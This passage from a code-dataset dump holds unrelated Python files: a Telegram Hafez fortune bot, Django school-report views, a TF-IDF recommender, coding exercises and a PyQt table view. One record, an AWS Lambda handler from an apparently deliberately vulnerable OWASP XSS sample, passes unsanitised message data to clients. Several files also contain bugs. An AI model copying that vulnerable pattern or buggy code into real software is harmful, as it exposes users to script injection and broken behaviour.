enumerate(self.persons.items()):\n print(f'{indi} : {person}: {person.size}')\n person.pos = (xcoord[person], self.size[1] - ycoord[person] - person.size[1])\n for i, (indi, fam) in enumerate(self.families.items()):\n print(f'{indi} : {fam}: {fam.size}')\n fam.pos = (xcoord[fam], self.size[1] - ycoord[fam] - fam.size[1])\n\n def do_layout(self, *args):\n super(RelativeLayout, self).do_layout(*args)\n self.test()\n","sub_path":"genealogy.py","file_name":"genealogy.py","file_ext":"py","file_size_in_byte":4181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"221038263","text":"#The area of a rectangle = length * width\n#ask for length and width of two rectangles\n#identify which one has the greater area or if they are the same\n\nlength1 = float(input(\"Enter length of Rectangle 1:\"))\nwidth1 = float(input(\"Enter width of Rectangle 1:\"))\nlength2 = float(input(\"Enter length of Rectangle 2:\"))\nwidth2 = float(input(\"Enter width of Rectangle 2:\"))\n\narea1 = length1 * width1\narea2 = length2 * width2\n\nif area1 > area2:\n print(\"Rectangle 1 has a greater area than Rectangle 2.\")\nelif area2 > area1:\n print(\"Rectangle 2 has a greater area than Rectangle 1.\")\nelse: \n print(\"The areas of Rectangle 1 and Rectangle 2 are the same.\")\n\n","sub_path":"intro_to_prog/Recitation03.py","file_name":"Recitation03.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"241858615","text":"from sklearn.feature_extraction.text import TfidfVectorizer\n\ndef user_formatting(users):\n \"\"\"\n :param users: users from json file\n :return: list of formatted users\n\n :example:\n\n users = [\n {\n 'id':13,\n 'first_name':\"Guillaume\",\n 'last_namer':\"Sturtzer\",\n 'age':20,\n 'job':\"Intern\",\n 'groups':[\"group1\", \"group2\"],\n 'coworkers':[\"coworker1\", \"coworker2\"],\n 'projects':[\"project1\", \"project2\"],\n 'use_articles':{\n 'project1':[],\n 'project2':['article1','article2']\n }\n }\n ]\n\n Return : [\"Intern group_group1 group_group2 coworker_coworker1 coworker_coworker2 project_project1 project_project2\"]\n \"\"\"\n const = {\n 'projects':'project_',\n 'groups':'group_',\n 'coworkers':'coworker_'\n }\n\n formatted_users = []\n for idx in users:\n user = users[idx]\n tmp_str = user['job']+\" \"\n for name in const:\n prefix = const[name]\n for x in user[name]:\n tmp_str += prefix+x+\" \"\n formatted_users.append(tmp_str)\n\n return formatted_users\n\ndef user_sparse_matrix(users):\n \"\"\"\n :param users: users from json file\n :return: sparse matrix for users\n \"\"\"\n TFIDF_vectorizer = TfidfVectorizer()\n\n users = user_formatting(users)\n return TFIDF_vectorizer.fit_transform(users)\n\n\ndef recommanded_articles_of_project(user, id_project, similar_users, all_users, all_articles, top_n=None):\n \"\"\"\n :param user: user data\n :param id_project: id of the project\n :param similar_users: most similar users\n :param all_users: all users data\n :param all_articles: all articles data\n :param top_n: number of the most similar elements returned. If None, all elements are returned\n :return: top_n tuples (article, user similarity)\n \"\"\"\n if id_project in user['use_articles']:\n articles_already_used = user['use_articles'][id_project]\n else:\n articles_already_used = []\n \n articles = []\n for user in similar_users:\n if id_project in all_users[str(user['id'])]['use_articles']:\n other_articles = all_users[str(user['id'])]['use_articles'][id_project]\n \n for article in [article for article in other_articles if article not in articles_already_used]:\n articles.append((article, user['similarity']))\n articles_already_used.append(article)\n if top_n is not None and top_n <= len(articles):\n return articles\n\n return articles\n\n\nif __name__ == '__main__':\n from sklearn.feature_extraction.text import TfidfVectorizer\n import sys\n from os.path import join, dirname\n sys.path.append(join(dirname(__file__), \"..\", \"..\"))\n from static.python.utils import load_json_file\n from static.python.utils import print_sparse_matrix\n from static.python.cosineSimilarity import create_cosine_similiarity_matrix, find_most_similar, find_n_most_similar\n\n articles_filename = 'static/articles.json'\n users_filename = 'static/users.json' \n\n users = load_json_file(users_filename)\n articles = load_json_file(articles_filename)\n link_id_cosine_to_user = {}\n id_project = \"project1\"\n\n i = 0\n for id_user in users:\n link_id_cosine_to_user[i] = id_user\n i += 1\n\n id_user = 0\n sparse_matrix = user_sparse_matrix(users)\n print_sparse_matrix(sparse_matrix)\n\n cosine_matrix = create_cosine_similiarity_matrix(sparse_matrix)\n similar_users = find_n_most_similar(cosine_matrix, id_user)\n\n for user in similar_users:\n user['id'] = link_id_cosine_to_user[user['id']]\n\n similar_articles = recommanded_articles_of_project(users[link_id_cosine_to_user[id_user]], id_project, similar_users, users, articles)\n print(similar_articles)\n # print(find_most_similar(cosine_matrix,0))\n # similar_users = find_n_most_similar(cosine_matrix,0,None)\n # print(similar_users)\n # user_solutions = users[str(0)]['use_articles']\n\n \n # order_articles_to_use = []\n # for user in similar_users:\n # other_articles = users[str(user['id'])]['use_articles']\n # for article in [article for article in other_articles if article not in order_articles_to_use and article not in user_solutions]:\n # order_articles_to_use.append(article)\n\n # print(order_articles_to_use)","sub_path":"static/python/userBased.py","file_name":"userBased.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29384103","text":"# Create your views here.\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.shortcuts import render_to_response\nfrom django.template import Context, loader, RequestContext\nfrom django.contrib.auth import logout, authenticate, login\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template.loader import get_template\nfrom learning_outcomes.models import *\nfrom learning_outcomes.forms import ContactForm\ndef home(request):\n\n\tvariables = Context({\n\t\t'head_title':'Learning Outcomes',\n\t\t'page_title':'Main Page',\n\t\t'page_body': 'Welcome',\n\t\t})\n\t\n\treturn render_to_response('base.html', variables)\n@login_required\ndef profile(request):\n\tuser = request.user\n\tfirst_name = request.user.first_name\n\tuser_email = request.user.email\n\tchildrens = Childrens.objects.filter(parent = user)\n\tvariables = Context({ 'user': user, \n\t\t\t\t\t\t 'user_email': user_email,\n\t\t\t\t\t\t 'user_first_name': first_name,\n\t\t\t\t\t\t 'childrens': childrens})\n\treturn render_to_response('profile.html', variables)\n\n@login_required\ndef student_page(request,child_name):\n\tuser = request.user\n\tuser_email = request.user.email\n\t\n\tchild_object = Childrens.objects.get(parent = user, child = child_name)\n\ttotal_classes =[]\n\ttotal_classes_int =[]\n\tfor in_year in child_object.year.all():\n\t\ttotal_classes.append(in_year)\n\tfor i in range(len(total_classes)):\n\t\ttotal_classes_int.append(int(str(total_classes[i])))\n\n\n\tpresent_class =max(total_classes_int)\n\tpdfs = PdfTemp.objects.filter(email=user_email, student_name = child_name)\n\tschool = child_object.school.all()\n\ttest = child_object.test.all()\n\tyear = child_object.year.all()\n\tsubject = child_object.subject.all()\n\tclass_semester ={'1st':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '2nd':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '3rd':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '4th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '5th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '6th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '7th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '8th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '9th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '10th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '11th':{'Semester1':[],'Semester2':[],'Semester3':[]},\n\t\t\t\t\t '12th':{'Semester1':[],'Semester2':[],'Semester3':[]},}\n\tfor students in pdfs:\n\t\tif students.year == '1' and students.test == 'Semester1':\n\t\t\tclass_semester['1st']['Semester1'].append(students)\n\t\tif students.year == '1' and students.test == 'Semester2':\n\t\t\tclass_semester['1st']['Semester2'].append(students)\n\t\tif students.year == '1' and students.test == 'Semester3':\n\t\t\tclass_semester['1st']['Semester3'].append(students)\n\n\n\t\tif students.year == '2' and students.test == 'Semester1':\n\t\t\tclass_semester['2nd']['Semester1'].append(students)\n\t\tif students.year == '2' and students.test == 'Semester2':\n\t\t\tclass_semester['2nd']['Semester2'].append(students)\n\t\tif students.year == '2' and students.test == 'Semester3':\n\t\t\tclass_semester['2nd']['Semester3'].append(students)\n\n\n\t\tif students.year == '3' and students.test == 'Semester1':\n\t\t\tclass_semester['3rd']['Semester1'].append(students)\n\t\tif students.year == '3' and students.test == 'Semester2':\n\t\t\tclass_semester['3rd']['Semester2'].append(students)\n\t\tif students.year == '3' and students.test == 'Semester3':\n\t\t\tclass_semester['3rd']['Semester3'].append(students)\n\n\n\t\tif students.year == '4' and students.test == 'Semester1':\n\t\t\tclass_semester['4th']['Semester1'].append(students)\n\t\tif students.year == '4' and students.test == 'Semester2':\n\t\t\tclass_semester['4th']['Semester2'].append(students)\n\t\tif students.year == '4' and students.test == 'Semester3':\n\t\t\tclass_semester['4th']['Semester3'].append(students)\n\n\n\t\tif students.year == '5' and students.test == 'Semester1':\n\t\t\tclass_semester['5th']['Semester1'].append(students)\n\t\tif students.year == '5' and students.test == 'Semester2':\n\t\t\tclass_semester['5th']['Semester2'].append(students)\n\t\tif students.year == '5' and students.test == 'Semester3':\n\t\t\tclass_semester['5th']['Semester3'].append(students)\n\n\t\tif students.year == '6' and students.test == 'Semester1':\n\t\t\tclass_semester['6th']['Semester1'].append(students)\n\t\tif students.year == '6' and students.test == 'Semester2':\n\t\t\tclass_semester['6th']['Semester2'].append(students)\n\t\tif students.year == '6' and students.test == 'Semester3':\n\t\t\tclass_semester['6th']['Semester3'].append(students)\n\n\t\tif students.year == '7' and students.test == 'Semester1':\n\t\t\tclass_semester['7th']['Semester1'].append(students)\n\t\tif students.year == '7' and students.test == 'Semester2':\n\t\t\tclass_semester['7th']['Semester2'].append(students)\n\t\tif students.year == '7' and students.test == 'Semester3':\n\t\t\tclass_semester['7th']['Semester3'].append(students)\n\n\t\tif students.year == '8' and students.test == 'Semester1':\n\t\t\tclass_semester['8th']['Semester1'].append(students)\n\t\tif students.year == '8' and students.test == 'Semester2':\n\t\t\tclass_semester['8th']['Semester2'].append(students)\n\t\tif students.year == '8' and students.test == 'Semester3':\n\t\t\tclass_semester['8th']['Semester3'].append(students)\n\n\t\tif students.year == '9' and students.test == 'Semester1':\n\t\t\tclass_semester['9th']['Semester1'].append(students)\n\t\tif students.year == '9' and students.test == 'Semester2':\n\t\t\tclass_semester['9th']['Semester2'].append(students)\n\t\tif students.year == '9' and students.test == 'Semester3':\n\t\t\tclass_semester['9th']['Semester3'].append(students)\n\n\t\tif students.year == '10' and students.test == 'Semester1':\n\t\t\tclass_semester['10th']['Semester1'].append(students)\n\t\tif students.year == '10' and students.test == 'Semester2':\n\t\t\tclass_semester['10th']['Semester2'].append(students)\n\t\tif students.year == '10' and students.test == 'Semester3':\n\t\t\tclass_semester['10th']['Semester3'].append(students)\n\n\t\tif students.year == '11' and students.test == 'Semester1':\n\t\t\tclass_semester['11th']['Semester1'].append(students)\n\t\tif students.year == '11' and students.test == 'Semester2':\n\t\t\tclass_semester['11th']['Semester2'].append(students)\n\t\tif students.year == '11' and students.test == 'Semester3':\n\t\t\tclass_semester['11th']['Semester3'].append(students)\n\n\t\tif students.year == '12' and students.test == 'Semester1':\n\t\t\tclass_semester['12th']['Semester1'].append(students)\n\t\tif students.year == '12' and students.test == 'Semester2':\n\t\t\tclass_semester['12th']['Semester2'].append(students)\n\t\tif students.year == '12' and students.test == 'Semester3':\n\t\t\tclass_semester['12th']['Semester3'].append(students)\n\n\t\t\n\t\"\"\"class1 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='1st')\n\tclass2 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='2nd')\n\tclass3 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='3rd')\n\tclass4 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='4th')\n\tclass5 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='5th')\n\tclass6 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='6th')\n\tclass7 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='7th')\n\tclass8 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='8th')\n\tclass9 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='9th')\n\tclass10 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='10th')\n\tclass11 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='11th')\n\tclass12 = PdfTemp.objects.filter(email=user_email, student_name = child_name, year='12th')\"\"\"\n\n\n\tvariables = Context({\n\t\t\t\t\t\t\t'school':school,\n\t\t\t\t\t\t\t'test': test,\n\t\t\t\t\t\t\t'year': year,\n\t\t\t\t\t\t\t'subject': subject,\n\t\t\t\t\t\t\t'child_name': child_name,\n\t\t\t\t\t\t\t'pdfs':pdfs,\n\t\t\t\t\t\t\t'present_class':present_class,\n\t\t\t\t\t\t\t'class1_semester1':class_semester['1st']['Semester1'],\n\t\t\t\t\t\t\t'class1_semester2':class_semester['1st']['Semester2'],\n\t\t\t\t\t\t\t'class1_semester3':class_semester['1st']['Semester3'],\n\t\t\t\t\t\t\t'class2_semester1':class_semester['2nd']['Semester1'],\n\t\t\t\t\t\t\t'class2_semester2':class_semester['2nd']['Semester2'],\n\t\t\t\t\t\t\t'class2_semester3':class_semester['2nd']['Semester3'],\n\t\t\t\t\t\t\t'class3_semester1':class_semester['3rd']['Semester1'],\n\t\t\t\t\t\t\t'class3_semester2':class_semester['3rd']['Semester2'],\n\t\t\t\t\t\t\t'class3_semester3':class_semester['3rd']['Semester3'],\n\t\t\t\t\t\t\t'class4_semester1':class_semester['4th']['Semester1'],\n\t\t\t\t\t\t\t'class4_semester2':class_semester['4th']['Semester2'],\n\t\t\t\t\t\t\t'class4_semester3':class_semester['4th']['Semester3'],\n\t\t\t\t\t\t\t'class5_semester1':class_semester['5th']['Semester1'],\n\t\t\t\t\t\t\t'class5_semester2':class_semester['5th']['Semester2'],\n\t\t\t\t\t\t\t'class5_semester3':class_semester['5th']['Semester3'],\n\t\t\t\t\t\t\t'class6_semester1':class_semester['6th']['Semester1'],\n\t\t\t\t\t\t\t'class6_semester2':class_semester['6th']['Semester2'],\n\t\t\t\t\t\t\t'class6_semester3':class_semester['6th']['Semester3'],\n\t\t\t\t\t\t\t'class7_semester1':class_semester['7th']['Semester1'],\n\t\t\t\t\t\t\t'class7_semester2':class_semester['7th']['Semester2'],\n\t\t\t\t\t\t\t'class7_semester3':class_semester['7th']['Semester3'],\n\t\t\t\t\t\t\t'class8_semester1':class_semester['8th']['Semester1'],\n\t\t\t\t\t\t\t'class8_semester2':class_semester['8th']['Semester2'],\n\t\t\t\t\t\t\t'class8_semester3':class_semester['8th']['Semester3'],\n\t\t\t\t\t\t\t'class9_semester1':class_semester['9th']['Semester1'],\n\t\t\t\t\t\t\t'class9_semester2':class_semester['9th']['Semester2'],\n\t\t\t\t\t\t\t'class9_semester3':class_semester['9th']['Semester3'],\n\t\t\t\t\t\t\t'class10_semester1':class_semester['10th']['Semester1'],\n\t\t\t\t\t\t\t'class10_semester2':class_semester['10th']['Semester2'],\n\t\t\t\t\t\t\t'class10_semester3':class_semester['10th']['Semester3'],\n\t\t\t\t\t\t\t'class11_semester1':class_semester['11th']['Semester1'],\n\t\t\t\t\t\t\t'class11_semester2':class_semester['11th']['Semester2'],\n\t\t\t\t\t\t\t'class11_semester3':class_semester['11th']['Semester3'],\n\t\t\t\t\t\t\t'class12_semester1':class_semester['12th']['Semester1'],\n\t\t\t\t\t\t\t'class12_semester2':class_semester['12th']['Semester2'],\n\t\t\t\t\t\t\t'class12_semester3':class_semester['12th']['Semester3'],\n\n\t\t})\n\treturn render_to_response ('student.html',variables)\n\n\n\n\n\n\n\n\ndef Contact(request):\n\tif request.method == \"POST\":\n\t\tform = ContactForm()\n\t\tif form.is_valid:\n\t\t\tcd = form.cleaned_data\n\t\t\tsend_email=(\n\t\t\t\tcd['subject'],\n\t\t\t\tcd['message'],\n\t\t\t\tcd.POST.get('email','noreply@example.com'),\n\t\t\t\t['siteowner@example.com'])\n\t\t\treturn HttpResponseRedirect('/contact/success')\n\telse:\n\t\tform = ContactForm(\n\t\t\tinitial={'subject':\"i love your site\"})\n\n\treturn render_to_response(\"contact.html\",{'form':form})","sub_path":"learning_outcomes/views_temp.py","file_name":"views_temp.py","file_ext":"py","file_size_in_byte":10707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"346227945","text":"'''\n443. String Compression My SubmissionsBack to Contest\n\nDifficulty: Easy\nGiven an array of characters, compress it in-place.\nThe length after compression must always be smaller than or equal to the original array.\nEvery element of the array should be a character (not int) of length 1.\nAfter you are done modifying the input array in-place, return the new length of the array.\n\nFollow up:\nCould you solve it using only O(1) extra space?\n\nExample 1:\nInput:\n[\"a\",\"a\",\"b\",\"b\",\"c\",\"c\",\"c\"]\n\nOutput:\nReturn 6, and the first 6 characters of the input array should be: [\"a\",\"2\",\"b\",\"2\",\"c\",\"3\"]\n\nExplanation:\n\"aa\" is replaced by \"a2\". \"bb\" is replaced by \"b2\". \"ccc\" is replaced by \"c3\".\nExample 2:\nInput:\n[\"a\"]\n\nOutput:\nReturn 1, and the first 1 characters of the input array should be: [\"a\"]\n\nExplanation:\nNothing is replaced.\nExample 3:\nInput:\n[\"a\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\",\"b\"]\n\nOutput:\nReturn 4, and the first 4 characters of the input array should be: [\"a\",\"b\",\"1\",\"2\"].\n\nExplanation:\nSince the character \"a\" does not repeat, it is not compressed. \"bbbbbbbbbbbb\" is replaced by \"b12\".\nNotice each digit has it's own entry in the array.\n'''\nclass Solution(object):\n def compress(self, chars):\n \"\"\"\n :type chars: List[str]\n :rtype: int\n \"\"\"\n if not chars:\n return 0\n curC = chars[0]\n curCount = 1\n ans = []\n for i in range(1, len(chars)):\n if chars[i] != curC:\n ans.append(curC)\n if curCount != 1:\n ans.extend(list(str(curCount)))\n curC = chars[i]\n curCount = 1\n else:\n curCount += 1\n ans.append(curC)\n if curCount != 1:\n ans.extend(list(str(curCount)))\n for i in range(len(ans)):\n chars[i] = ans[i]\n\n return len(ans)\nsol = Solution()\nprint(sol.compress([\"a\",\"a\",\"b\",\"b\",\"c\",\"c\",\"c\"]))\n\n\n\n\n\n\n","sub_path":"LeetCodeContests/56/string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"136113069","text":"# TOKEN = demjson.decode(open('../files/constants.json','r').read())['TOKEN']\n\nfrom colors import colors\nimport sys\nimport asyncio\nimport subprocess\nimport telepot\nimport demjson\nimport time\nimport codecs\nfrom random import randint\nfrom telepot import message_identifier, glance\nfrom telepot.aio.loop import MessageLoop\nfrom telepot.aio.delegate import pave_event_space, per_chat_id, create_open\nfrom telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton\n\napp_constants = demjson.decode(open('../files/constants.json', 'r').read())\ncurent_hafez_faal = {}\n\n\ndef is_admin(user_id):\n admins = app_constants['ADMIN IDS']\n for admin in admins:\n if(user_id == admin):\n print('>> ADMIN PERMISSION <<')\n return True\n else:\n return False\n\n\nasync def on_chat_message(msg):\n # defaults\n print(colors.HEADER + '@' + msg['from']['username'] + ': ' + colors.OKBLUE + '\\\"' + msg['text'] + '\\\"' +\n colors.WARNING + ' (' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(msg['date'])) + ')' + colors.ENDC)\n log_file = codecs.open('../files/logs.txt', 'a', 'utf-8')\n log_file.write('@' + msg['from']['username'] + ' \\\"' + msg['text'] + '\\\"' +\n ' (' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(msg['date'])) + ')\\n')\n log_file.close()\n hafez_faal_recieved = False\n # 📗 فال حافظ\n if(msg['text'] == '📗 فال حافظ'):\n curent_hafez_faal[msg['chat']['id']] = randint(1, 495)\n await bot.sendMessage(msg['chat']['id'], 'علاقه مند هستین که فال خود را به چه صورتی دریافت کنید ؟', reply_markup={'keyboard': [['📷 دری��فت عکس از فال'], ['🗣 دریافت فایل صوتی'], ['✒ دریافت متن فال'], ['➡ بازگشت به منو اصلی']], 'selective': True})\n # 📷 دریافت عکس از فال\n elif(msg['text'] == '📷 دریافت عکس از فال'):\n await bot.sendPhoto(msg['chat']['id'], open('../files/hafez/images/' + str(curent_hafez_faal[msg['chat']['id']]) + '.png', 'rb'), reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n ]]))\n # 🗣 دریافت فایل صوتی\n elif(msg['text'] == '🗣 دریافت فایل صوتی'):\n await bot.sendVoice(msg['chat']['id'], open('../files/hafez/voices/' + str(curent_hafez_faal[msg['chat']['id']]) + '.ogg', 'rb'), reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n ]]))\n # ✒ دریافت متن فال\n elif(msg['text'] == '✒ دریافت متن فال'):\n vars = codecs.open('../files/hafez/texts/' + str(\n curent_hafez_faal[msg['chat']['id']]) + '.txt', 'r', \"utf-8\").readlines()\n # vars = codecs.open('../files/hafez/texts/2.txt','r',\"utf-8\").readlines()\n result = ''\n for var in vars:\n result += var.replace('\\\\n\\\\t', '\\n') + '\\n'\n # await bot.sendMessage(msg['chat']['id'],result,reply_markup= {'keyboard': [['📷 دریافت عکس از فال','🗣 دریافت فایل صوتی'],['🔮 دریافت تعبیر فال','✒ دریافت متن فال'],['➡ بازگشت به منو اصلی']], 'selective': True})\n await bot.sendMessage(msg['chat']['id'], result, reply_markup=InlineKeyboardMarkup(inline_keyboard=[[\n InlineKeyboardButton(text='دریافت تعبیر فال 🔮', callback_data='yes'),\n ]]))\n # on admin commands\n elif(msg['text'] == 'ipconfig'):\n if(is_admin(msg['chat']['id'])):\n ip_details = str(subprocess.check_output(\"ipconfig\")).strip('\\n')\n ip_details = ip_details.strip('\\r')\n await bot.sendMessage(msg['chat']['id'],ip_details) \n # on any message\n else:\n hafez_faal_recieved = False\n await bot.sendMessage(msg['chat']['id'], 'گزینه ی دلخواه خود را انتخاب کنید ', reply_markup={'keyboard': [['📗 فال حافظ']], 'selective': True})\n\n\nasync def on_callback_query(msg):\n query_id, from_id, query_data = glance(msg, flavor='callback_query')\n if query_data == 'yes':\n result = codecs.open('../files/hafez/interpretations/' + str(\n curent_hafez_faal[from_id]) + '.txt', 'r', \"utf-8\").readlines()\n await bot.sendMessage(from_id,str(result[0]))\n \n\nbot = telepot.aio.Bot(app_constants['TOKEN'])\nloop = asyncio.get_event_loop()\nloop.create_task(MessageLoop(\n bot, {'chat': on_chat_message, 'callback_query': on_callback_query}).run_forever())\nprint(colors.OKGREEN + 'Bot start\\'s running ...' + colors.ENDC)\nloop.run_forever()\n","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"650285793","text":"import boto3, json\n\ndef lambda_handler(event, context):\n msg_id = event['Records'][0]['Sns']['MessageId']\n msg_data = event['Records'][0]['Sns'][Message]\n\n client = boto3.client('iot-data', region_name='us-east-1')\n link = \"Click\"\n response = client.publish(\n topic='protego-a7-topic',\n qos=1,\n payload=json.dumps({\"msg\": msg_data, \"id\": link})\n )\n","sub_path":"python-serverless-owasp-api_xss/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"254539069","text":"from PyQt4 import QtCore, QtGui\r\nfrom datetime import datetime\r\n\r\nimport module.common as common\r\nimport module.asset as asset\r\nfrom obj.psr_field import WriteElementTypes\r\n\r\nclass PSRRawDataTableView(QtGui.QTableView):\r\n def __init__(self, parent = None):\r\n super(PSRRawDataTableView, self).__init__(parent)\r\n\r\n self.initialize_user_interface()\r\n\r\n self.initialize_model()\r\n\r\n self.initialize_signals()\r\n\r\n def initialize_user_interface(self):\r\n self.clearDataAction = QtGui.QAction('&Clear New Data', self)\r\n self.reloadDataAction = QtGui.QAction('Reload Data from Agile', self)\r\n\r\n self.copyDataAction = QtGui.QAction('Copy', self)\r\n self.copyDataAction.setShortcut(QtGui.QKeySequence('Ctrl+C'))\r\n self.copyDataAction.setShortcutContext(QtCore.Qt.WidgetShortcut)\r\n\r\n self.appendAndEditAction = QtGui.QAction('&Append and Edit', self)\r\n self.appendAndEditWithSignatureAction = QtGui.QAction('App&end and Edit with Signature', self)\r\n self.writeNullValueAction = QtGui.QAction('&Write Null Value', self)\r\n\r\n def initialize_model(self):\r\n from widget.finale.obj.psr_raw_data_table_view_model import PSRRawDataTableViewModel\r\n\r\n self.model = PSRRawDataTableViewModel()\r\n self.setModel(self.model)\r\n\r\n from widget.finale.obj.psr_raw_data_table_view_edit_delegate import PSRRawDataTableViewEditDelegate\r\n\r\n self.psr_raw_data_table_view_edit_delegate = PSRRawDataTableViewEditDelegate(self)\r\n self.setItemDelegate(self.psr_raw_data_table_view_edit_delegate)\r\n\r\n def initialize_signals(self):\r\n self.model.dataChanged.connect(self.on_model_dataChange)\r\n\r\n self.clearDataAction.triggered.connect(self.on_clearDataAction_trigger)\r\n self.reloadDataAction.triggered.connect(self.on_reloadDataAction_trigger)\r\n self.copyDataAction.triggered.connect(self.on_copyDataAction_trigger)\r\n self.appendAndEditAction.triggered.connect(self.on_appendAndEditAction_trigger)\r\n self.appendAndEditWithSignatureAction.triggered.connect(self.on_appendAndEditWithSignatureAction_trigger)\r\n self.writeNullValueAction.triggered.connect(self.on_writeNullValueAction_trigger)\r\n\r\n self.model.modelReset.connect(self.on_model_modelReset)\r\n\r\n def set_new_data(self, psrs, filter_text):\r\n psr_types = set([psr.get_field_by_field_group('psr_type').current_data for psr in psrs if psr.get_field_by_field_group('psr_type') is not None])\r\n\r\n if len(psr_types) == 1 and '' not in psr_types:\r\n self.show()\r\n\r\n self.model.beginResetModel()\r\n\r\n self.model.psrs = psrs\r\n\r\n filters = [filter.strip() for filter in str(filter_text).lower().split(',') if filter.strip() != '']\r\n\r\n if len(filters) != 0:\r\n self.model.filtered_indexes = []\r\n\r\n for filter in filters:\r\n for i, field in enumerate(psrs[0].fields):\r\n if filter in field.display_name.lower() and i not in self.model.filtered_indexes:\r\n self.model.filtered_indexes.append(i)\r\n else:\r\n self.model.filtered_indexes = xrange(len(psrs[0].fields))\r\n\r\n self.model.endResetModel()\r\n\r\n else:\r\n self.hide()\r\n\r\n self.reflow_layout()\r\n\r\n def reflow_layout(self):\r\n for i in xrange(self.horizontalHeader().count()):\r\n self.horizontalHeader().setResizeMode(i, QtGui.QHeaderView.Stretch)\r\n self.resizeRowsToContents()\r\n\r\n def on_model_dataChange(self, topLeft, bottomRight):\r\n self.reflow_layout()\r\n\r\n def on_model_modelReset(self):\r\n self.reflow_layout()\r\n\r\n def contextMenuEvent(self, event):\r\n contextMenu = QtGui.QMenu(self)\r\n\r\n if self.model.data(self.currentIndex(), role = QtCore.Qt.DecorationRole) is not None:\r\n contextMenu.addAction(self.clearDataAction)\r\n\r\n # Append and Edit Action, Write Null Value Action\r\n editable_item_selected = self.model.flags(self.currentIndex()) & QtCore.Qt.ItemIsEditable == QtCore.Qt.ItemIsEditable\r\n if editable_item_selected:\r\n contextMenu.addAction(self.appendAndEditAction)\r\n contextMenu.addAction(self.appendAndEditWithSignatureAction)\r\n contextMenu.addAction(self.writeNullValueAction)\r\n\r\n contextMenu.addSeparator()\r\n\r\n # Copy Selected Data Action\r\n contextMenu.addAction(self.copyDataAction)\r\n\r\n contextMenu.popup(self.viewport().mapToGlobal(event.pos()))\r\n\r\n def on_clearDataAction_trigger(self):\r\n for index in self.selectedIndexes():\r\n self.model.setData(index, None)\r\n\r\n def on_copyDataAction_trigger(self):\r\n '''\r\n Copies the selected cell contents to clipboard in a format that is parse-able by Excel.\r\n Note that if an extended selection is made, this will copy all interim cell contents!\r\n '''\r\n def code():\r\n if len(self.selectedIndexes()) == 1: # If only one cell is selected, simply copy it's contents to the clipboard.\r\n QtGui.QApplication.clipboard().setText(self.model.data(self.currentIndex()))\r\n\r\n else: # If more than one cell is selected, we need to check some things\r\n top_left = self.selectedIndexes()[0]\r\n bottom_right = self.selectedIndexes()[-1]\r\n\r\n import StringIO, csv\r\n\r\n csv_string = StringIO.StringIO()\r\n csv_writer = csv.writer(csv_string)\r\n\r\n # Determine if only a single row or a single column of cells is selected.\r\n # If true, we will not be copying header data.\r\n single_row_or_column = ( top_left.row() == bottom_right.row()) or (top_left.column() == bottom_right.column() )\r\n\r\n if not single_row_or_column:\r\n horizontal_headers = [self.model.headerData(section, orientation = QtCore.Qt.Horizontal) for section in range(top_left.column(), bottom_right.column()+1)]\r\n csv_writer.writerow([''] + horizontal_headers)\r\n\r\n for row_i in xrange(top_left.row(), bottom_right.row()+1):\r\n row_indexes = [self.model.index(row_i, j) for j in range(top_left.column(), bottom_right.column()+1)]\r\n\r\n row_to_write = [self.model.data(index).toUtf8() for index in row_indexes]\r\n if not single_row_or_column:\r\n row_to_write.insert(0, self.model.headerData(row_i, orientation = QtCore.Qt.Vertical))\r\n\r\n csv_writer.writerow(row_to_write)\r\n\r\n QtGui.QApplication.clipboard().setText(csv_string.getvalue())\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def 